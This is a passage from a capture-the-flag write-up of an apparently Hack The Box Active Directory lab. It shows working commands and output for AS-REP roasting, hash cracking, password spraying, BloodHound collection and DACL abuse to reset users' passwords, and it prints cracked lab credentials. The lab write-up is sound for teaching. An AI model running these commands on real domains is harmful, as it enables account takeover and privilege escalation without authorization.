class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat tmp |awk -F' ' '{print $7}'</span><br><span class="line">o.martinez@infiltrator.htb</span><br><span class="line">d.anderson@infiltrator.htb</span><br><span class="line">k.turner@infiltrator.htb</span><br><span class="line">a.walker@infiltrator.htb</span><br><span class="line">m.harris@infiltrator.htb</span><br><span class="line">e.rodriguez@infiltrator.htb</span><br><span class="line">l.clark@infiltrator.htb</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat tmp |awk -F' ' '{print $7}' > AD_usr</span><br></pre></td></tr></table></figure><h2 id="GetNPUsers"><a href="#GetNPUsers" class="headerlink" title="GetNPUsers"></a>GetNPUsers</h2><p>Time to collect some hashes.</p><p>This uses impacket, which is preinstalled on Kali. If, like me, you use pyenv and like <code>pyenv global</code>, which shadows the distro's python, you can add <code>rm /home/kali/.pyenv/shims/python3</code> to <code>~/.zshrc</code>.<br>Note that <code>/home/kali</code> is your own home directory; do not copy it verbatim unless your user is also kali.<br>This keeps the system tools that depend on the distro python working while you keep using pyenv's python for your own projects, so a failed experiment does not mean rebuilding the environment.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass </span><br><span 
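class="line"></span><br></pre></td></tr></table></figure><p>Added example, written for this edit and not code from the original write-up or from kerbrute/impacket: the three enumeration steps above (the awk name permutations, filtering kerbrute's confirmed accounts, and pulling the AS-REP hash out of GetNPUsers output) as reusable shell functions. It generalises the post's awk to two extra logon-name formats (flast and firstl) and checks that a hash line has the shape hashcat mode 18200 expects before it is fed in. The sample lines at the bottom are constructed copies of the tool output shown on this page (the hash is truncated); only POSIX sh, awk and sed are assumed.</p>

```bash
#!/bin/sh
# Added example (not from the original post). Reusable shell functions for
# the enumeration steps of this write-up. Assumes only POSIX sh, awk and sed.

# "First Last" lines -> candidate logon names. The post tries first.last,
# first_last, f.last and f_last; flast and firstl are added here because
# they are common in real domains.
gen_ad_usernames() {
  awk -v d="$1" '
    NF >= 2 {
      f = tolower($1); l = tolower($2)
      print f "." l "@" d
      print f "_" l "@" d
      print substr(f, 1, 1) "." l "@" d
      print substr(f, 1, 1) "_" l "@" d
      print substr(f, 1, 1) l "@" d
      print f substr(l, 1, 1) "@" d
    }'
}

# kerbrute output -> confirmed accounts only. Keys on the "[+] VALID
# USERNAME:" marker instead of the field position ($7) the post used, so it
# keeps working if the timestamp format changes.
kerbrute_valid_users() {
  sed -n 's/.*\[+] VALID USERNAME: *\([^ ]*\).*/\1/p'
}

# GetNPUsers output -> "<user>@<realm>" for every line that is a well-formed
# AS-REP hash: $krb5asrep$23$<user@realm>:<32 hex checksum>$<hex edata>.
# That is the shape hashcat mode 18200 expects; anything else is dropped.
asrep_hash_user() {
  sed -n 's/^\$krb5asrep\$23\$\([^:]*\):[0-9a-f]\{32\}\$[0-9a-f]\{1,\}$/\1/p'
}

# Constructed sample input mirroring the output shown on this page
# (the edata is truncated; a real hash is several hundred hex characters).
names='David Anderson
Lauren Clark'
kerbrute_out='2024/09/05 22:23:06 > [+] VALID USERNAME: d.anderson@infiltrator.htb
2024/09/05 22:23:13 > [+] VALID USERNAME: l.clark@infiltrator.htb
2024/09/05 22:23:13 > Done! Tested 12 usernames (2 valid) in 8.431 seconds'
npusers_out='[-] User d.anderson@infiltrator.htb does not have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:52c941038bffe158a729e721a83eca5c$2478d99303d3d9edfd1cbadb41a6463a'

printf '%s\n' "$names" | gen_ad_usernames infiltrator.htb   # 12 candidates
printf '%s\n' "$kerbrute_out" | kerbrute_valid_users         # the 2 confirmed accounts
printf '%s\n' "$npusers_out" | asrep_hash_user               # l.clark@infiltrator.htb@INFILTRATOR.HTB
```

<p>Pipe the names file into <code>gen_ad_usernames</code> in place of the awk one-liner, and the saved kerbrute and GetNPUsers output into the other two functions instead of hand-editing tmp files. The hash check is deliberately strict: a hash that was truncated or line-wrapped while being copied is the usual reason hashcat reports a token length exception.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span 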
class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:52c941038bffe158a729e721a83eca5c$2478d99303d3d9edfd1cbadb41a6463a2df4a97acdf4da4e2c185394c651e78019bb401643cd1c86cd20f9edc5b81025b12fcc553aaa2db741eee0ce7d0a2b86b6ef1a71bf90fb31d7d4cd5d7a6fb44a89cd64613d263e59d00910d52924d2dfb21a0c6db95e996cb51806865d536252484a78a81238161462bb029cdf37c0181e85f038578216f4653351edfb24c46e10faafe0536a539e7a2c52ffccd5503031c177e0564b1b431bc7e02cc1424628dd238503c0a1f58e5398dfb9d9985307f650f52f1165317a20617a2bb4aa2872113f6f3ceb218e226d97551dd599c3cff76e5b47bdfa6d8517f92733073d702951b4</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Only <code>l.clark</code> has <code>UF_DONT_REQUIRE_PREAUTH</code> set, so only that account hands out an AS-REP whose encrypted part can be cracked offline (AS-REP roasting).</p><p>If DNS is not configured, remember to add <code>-dc-ip dc01.infiltrator.htb</code> (or the DC's address, 10.10.11.31, if the name only lives in your hosts file)</p><p>that is</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass -dc-ip dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><p>Save the hash to a file so hashcat can work on it.<br>The output shows it belongs to <a href="mailto:l.clark@infiltrator.htb">l.clark@infiltrator.htb</a>, so name the file after that user.</p><h2 id="Hashcat"><a href="#Hashcat" class="headerlink" 
title="Hashcat"></a>Hashcat</h2><p>hashcat can identify the hash type on its own; afterwards pass it explicitly with -m:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─$ hashcat l.clark@infiltrator.htb_hash </span><br><span class="line">hashcat (v6.2.6) starting in autodetect mode</span><br><span class="line"></span><br><span class="line">OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]</span><br><span class="line">==================================================================================================================================================</span><br><span class="line">* Device #1: cpu-haswell-AMD Ryzen 7 4800U with Radeon Graphics, 1439/2942 MB (512 MB allocatable), 8MCU</span><br><span class="line"></span><br><span class="line">Hash-mode was not specified with -m. Attempting to auto-detect hash mode.</span><br><span class="line">The following mode was auto-detected as the only one matching your input hash:</span><br><span class="line"></span><br><span class="line">18200 | Kerberos 5, etype 23, AS-REP | Network Protocol</span><br><span class="line"></span><br><span class="line">NOTE: Auto-detect is best effort. 
The correct hash-mode is NOT guaranteed!</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>It recognises the hash straight away as <code>18200 | Kerberos 5, etype 23, AS-REP | Network Protocol</code><br>so from here on we pass <code>-m 18200</code></p><p>Then point rockyou at it:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure><p>Cracked in seconds; use <code>--show</code> to print the result:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt --show</span><br><span class="line">$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:1877dab6354c43532e0888a464b5b166$1a5e7f261487819c2413695ebffd0d8d7237199d320d65523e864df65becf802953e64eb7203da62766c6d06e97aba69faa81752444745b8e115ee538295dbe58b935df7a5ace5731811932504c6dd57dd2175d4519a7cf4099a9e883dcf8cf9c7bb1097fa65c05ab463350cc144a0cb181f240002153e2e6950b3d9c38ad7b5187a1de9430a0014ea457c9fcc88cd0715f14b436ebfd13daec3764611a4e1e4df4923b9966272b5881589b38f6ca58a53cb7f5f4fc5eb040132e659fa6cd3bd8af53789fc9fcf5d59d793721786c6f0f7176da6fb25a1fda116ab806b1328762bf874b58493948b1ecc4d682bc336f451a2:WAT?watismypass!</span><br></pre></td></tr></table></figure><p>Good, that gives us our first set of credentials:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">l.clark@infiltrator.htb:WAT?watismypass!</span><br></pre></td></tr></table></figure><h1 id="域渗透"><a href="#域渗透" class="headerlink" title="Domain penetration"></a>Domain penetration</h1><p>Try psexec first:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-psexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb </span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] Requesting shares on dc01.infiltrator.htb.....</span><br><span class="line">[-] share 'ADMIN$' is not writable.</span><br><span class="line">[-] share 'C$' is not writable.</span><br><span class="line">[-] share 'NETLOGON' is not writable.</span><br><span class="line">[-] share 'SYSVOL' is not writable.</span><br></pre></td></tr></table></figure><p>Oh no, not enough privileges.</p><p><strong>Prerequisites for psexec</strong></p><ol><li>port 445 open</li><li>a writable share (psexec uploads a service binary there and starts it through the Service Control Manager, which needs local administrator rights)</li></ol><p>Similar tools are smbexec, atexec, wmiexec and dcomexec.<br>Since there is no writable share, try atexec next:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">─$ impacket-atexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd </span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[!] 
This will work ONLY on Windows >= Vista</span><br><span class="line">[*] Creating task \wPBwKvid</span><br><span class="line">[-] rpc_s_access_denied</span><br></pre></td></tr></table></figure><p>Next, wmiexec:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-wmiexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">[-] WMI Session Error: code: 0x80041003 - WBEM_E_ACCESS_DENIED</span><br></pre></td></tr></table></figure><p>Last, dcomexec; if that fails too, we need a different approach:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-dcomexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">[-] DCOM SessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.</span><br></pre></td></tr></table></figure><p>All four methods need local administrator rights on the target (service creation, the Task Scheduler RPC interface, WMI and DCOM activation are admin-only by default), so these errors simply confirm that l.clark is an ordinary user. Different approach it is.<br>First build a plain username list, newuser:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat AD_usr| awk -F '@' '{print $1}'</span><br><span class="line">o.martinez</span><br><span class="line">d.anderson</span><br><span class="line">k.turner</span><br><span class="line">a.walker</span><br><span class="line">m.harris</span><br><span class="line">e.rodriguez</span><br><span class="line">l.clark</span><br><span class="line">└─$ cat AD_usr| awk -F '@' '{print $1}' >newuser</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="密码喷射"><a href="#密码喷射" class="headerlink" title="Password spraying"></a>Password spraying</h2><p>Spray the cracked password across the whole list. On the face of it only l.clark uses it:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ crackmapexec smb 10.10.11.31 -u newuser -p pass</span><br><span class="line">SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\e.rodriguez:WAT?watismypass! 
STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass! </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION</span><br></pre></td></tr></table></figure><p>d.anderson and m.harris stand out. <code>STATUS_ACCOUNT_RESTRICTION</code> is not a wrong-password error: the password was accepted, and a restriction on the account (logon hours, allowed workstations, an NTLM restriction and the like) then blocked this particular SMB logon. So the password is very likely reused on those two accounts.</p><h2 id="getTGT"><a href="#getTGT" class="headerlink" title="getTGT"></a>getTGT</h2><p>Sure enough, d.anderson really does use this password: a Kerberos TGT request with it succeeds.</p><p>On the Singapore VPN node I got this error<br><strong>Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</strong><br>while the US node worked fine. The KDC rejects requests whose timestamp differs from its own clock by more than the allowed skew (5 minutes by default), so the reliable fix is to sync your clock with the DC, for example <code>sudo ntpdate dc01.infiltrator.htb</code>, or to run the command under <code>faketime</code>, rather than switching VPN nodes.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] Saving ticket in d.anderson.ccache</span><br></pre></td></tr></table></figure><h2 id="bloodhound"><a href="#bloodhound" class="headerlink" title="bloodhound"></a>bloodhound</h2><p>Use the Python collector:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bloodhound-python -d infiltrator.htb -u l.clark -p "WAT?watismypass\!" 
-c all --dns-tcp --zip</span><br></pre></td></tr></table></figure><p>Collection works, but <code>l.clark</code> has nothing useful.<br>Run it again as <code>d.anderson</code>:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─$ bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip </span><br><span class="line">INFO: Found AD domain: infiltrator.htb</span><br><span class="line">INFO: Getting TGT for user</span><br><span class="line">INFO: Connecting to LDAP server: dc01.infiltrator.htb</span><br><span class="line">INFO: Found 1 domains</span><br><span class="line">INFO: Found 1 domains in the forest</span><br><span class="line">INFO: Found 1 computers</span><br><span class="line">INFO: Connecting to LDAP server: dc01.infiltrator.htb</span><br><span class="line">INFO: Found 14 users</span><br><span class="line">INFO: Found 58 groups</span><br><span class="line">INFO: Found 2 gpos</span><br><span class="line">INFO: Found 2 ous</span><br><span class="line">INFO: Found 19 containers</span><br><span class="line">INFO: Found 0 trusts</span><br><span class="line">INFO: Starting computer enumeration with 10 workers</span><br><span class="line">INFO: Querying computer: dc01.infiltrator.htb</span><br><span class="line">INFO: Done in 01M 03S</span><br><span class="line">INFO: Compressing output into 
20240906085109_bloodhound.zip</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>d.anderson</code> is the useful one.<br>When re-importing the data, clear the sessions and the database first to avoid odd errors.<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906215945.png"><br>There is a complete attack path:</p><h3 id="x44-46-x41-x4e-68-69-x52-83-x4f-78-64-73-78-70-x49-76-84-82-65-84-x4f-x52-x2e-x48-84-x42-—GenericAll—-MARKETING-x44-x49-71-x49-x54-65-x4c-64-x49-x4e-x46-73-76-x54-82-65-x54-79-x52-x2e-x48-x54-x42"><a href="#x44-46-x41-x4e-68-69-x52-83-x4f-78-64-73-78-70-x49-76-84-82-65-84-x4f-x52-x2e-x48-84-x42-—GenericAll—-MARKETING-x44-x49-71-x49-x54-65-x4c-64-x49-x4e-x46-73-76-x54-82-65-x54-79-x52-x2e-x48-x54-x42" class="headerlink" title="D.ANDERSON@INFILTRATOR.HTB —GenericAll—>MARKETING DIGITAL@INFILTRATOR.HTB"></a><a href="mailto:D.ANDERSON@INFILTRATOR.HTB">D.ANDERSON@INFILTRATOR.HTB</a> —GenericAll—>MARKETING <a href="mailto:DIGITAL@INFILTRATOR.HTB">DIGITAL@INFILTRATOR.HTB</a></h3><p>Check the BloodHound help for the edge<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906220204.png"><br>and the explanation below it:<br>GenericAll is also called full control; it allows the trustee to manipulate the target object in any way they want.<br>The edge is on the OU, not on the users inside it, so the first step is to write an inheritable FullControl ACE for d.anderson on OU=MARKETING DIGITAL; with inheritance the ACE propagates to the user objects in the OU (dacledit warns that objects with adminCount=1 are excluded from this):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ export KRB5CCNAME=d.anderson.ccache</span><br><span class="line"></span><br><span class="line">└─$ dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
</span><br><span class="line"></span><br><span class="line">[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU</span><br><span class="line">[*] DACL backed up to dacledit-20240906-093926.bak</span><br><span class="line">[*] DACL modified successfully!</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="MARKETING-68-x49-x47-73-84-65-x4c-x40-x49-78-x46-x49-x4c-x54-x52-x41-x54-79-82-46-72-84-66-—Contains—-69-x2e-82-79-x44-x52-73-71-x55-x45-90-x40-x49-78-70-73-x4c-84-x52-65-84-x4f-x52-x2e-72-84-x42"><a href="#MARKETING-68-x49-x47-73-84-65-x4c-x40-x49-78-x46-x49-x4c-x54-x52-x41-x54-79-82-46-72-84-66-—Contains—-69-x2e-82-79-x44-x52-73-71-x55-x45-90-x40-x49-78-70-73-x4c-84-x52-65-84-x4f-x52-x2e-72-84-x42" class="headerlink" title="MARKETING DIGITAL@INFILTRATOR.HTB —Contains—>E.RODRIGUEZ@INFILTRATOR.HTB"></a>MARKETING <a href="mailto:DIGITAL@INFILTRATOR.HTB">DIGITAL@INFILTRATOR.HTB</a> —Contains—><a href="mailto:E.RODRIGUEZ@INFILTRATOR.HTB">E.RODRIGUEZ@INFILTRATOR.HTB</a></h3><p>Now that d.anderson has full control over everything under MARKETING DIGITAL@INFILTRATOR.HTB, and e.rodriguez is one of the users in that OU, reset that user's password so we can use the account:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" 
set password "e.rodriguez" "QWEasd123@123" </span><br></pre></td></tr></table></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906221253.png"></p><p>You have to be quick here; otherwise the change is refused with</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Password can't be changed before -2 days, 23:55:48.953082 because of the minimum password age policy.</span><br></pre></td></tr></table></figure><p>The minimum-password-age policy allows only one change per interval, and on this shared box other players keep resetting the same accounts, which is why the timing matters.</p><h3 id="69-x2e-82-x4f-x44-x52-73-x47-x55-x45-90-64-x49-78-x46-x49-x4c-84-x52-65-x54-79-82-46-x48-84-66-45-45-x2d-x61-100-100-115-101-x6c-f—-CHIEFS-77-x41-x52-75-x45-84-73-x4e-71-64-x49-x4e-70-x49-x4c-84-82-x41-84-x4f-82-x2e-72-x54-66"><a href="#69-x2e-82-x4f-x44-x52-73-x47-x55-x45-90-64-x49-78-x46-x49-x4c-84-x52-65-x54-79-82-46-x48-84-66-45-45-x2d-x61-100-100-115-101-x6c-f—-CHIEFS-77-x41-x52-75-x45-84-73-x4e-71-64-x49-x4e-70-x49-x4c-84-82-x41-84-x4f-82-x2e-72-x54-66" class="headerlink" title="E.RODRIGUEZ@INFILTRATOR.HTB —AddSelf—>CHIEFS MARKETING@INFILTRATOR.HTB"></a>E.RODRIGUEZ@INFILTRATOR.HTB —AddSelf—>CHIEFS MARKETING@INFILTRATOR.HTB</h3><p>AddSelf means the e.rodriguez account can add itself to the group CHIEFS MARKETING@INFILTRATOR.HTB. Get a ticket as e.rodriguez first, point KRB5CCNAME at it, then add the membership:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/"e.rodriguez":"QWEasd123@123" -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">export KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line"></span><br><span class="line">python 
/opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="CHIEFS-77-x41-82-x4b-69-84-73-78-71-x40-x49-x4e-70-73-76-x54-82-x41-84-x4f-x52-46-72-84-x42-45-x2d-x2d-x66-111-x72-x63-x65-99-x68-97-x6e-103-x65-112-97-115-x73-119-111-x72-d—-77-x2e-x48-x41-82-x52-x49-x53-x40-73-x4e-x46-x49-x4c-x54-x52-65-84-x4f-x52-x2e-72-x54-66"><a href="#CHIEFS-77-x41-82-x4b-69-84-73-78-71-x40-x49-x4e-70-73-76-x54-82-x41-84-x4f-x52-46-72-84-x42-45-x2d-x2d-x66-111-x72-x63-x65-99-x68-97-x6e-103-x65-112-97-115-x73-119-111-x72-d—-77-x2e-x48-x41-82-x52-x49-x53-x40-73-x4e-x46-x49-x4c-x54-x52-65-84-x4f-x52-x2e-72-x54-66" class="headerlink" title="CHIEFS MARKETING@INFILTRATOR.HTB —ForceChangePassword—> M.HARRIS@INFILTRATOR.HTB"></a>CHIEFS MARKETING@INFILTRATOR.HTB —ForceChangePassword—> M.HARRIS@INFILTRATOR.HTB</h3><p>Now that e.rodriguez is a member of CHIEFS MARKETING@INFILTRATOR.HTB, which holds ForceChangePassword over M.HARRIS@INFILTRATOR.HTB, the e.rodriguez account can reset m.harris's password. Group membership is evaluated when a ticket is issued, so the TGT obtained before the group change does not carry the new group; the command below authenticates with the password again instead of reusing the cached ticket, so it gets a fresh one:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" 
"QWEasd123@123"</span><br></pre></td></tr></table></figure><p>Then get a TGT for <code>m.harris</code> and log in with <code>evil-winrm</code> using it.</p><p>Annoyingly, this box is shared, so other players keep overwriting the passwords; the only reliable way is to run the whole chain in one go:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">export KRB5CCNAME=d.anderson.ccache</span><br><span class="line"></span><br><span class="line">dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" 
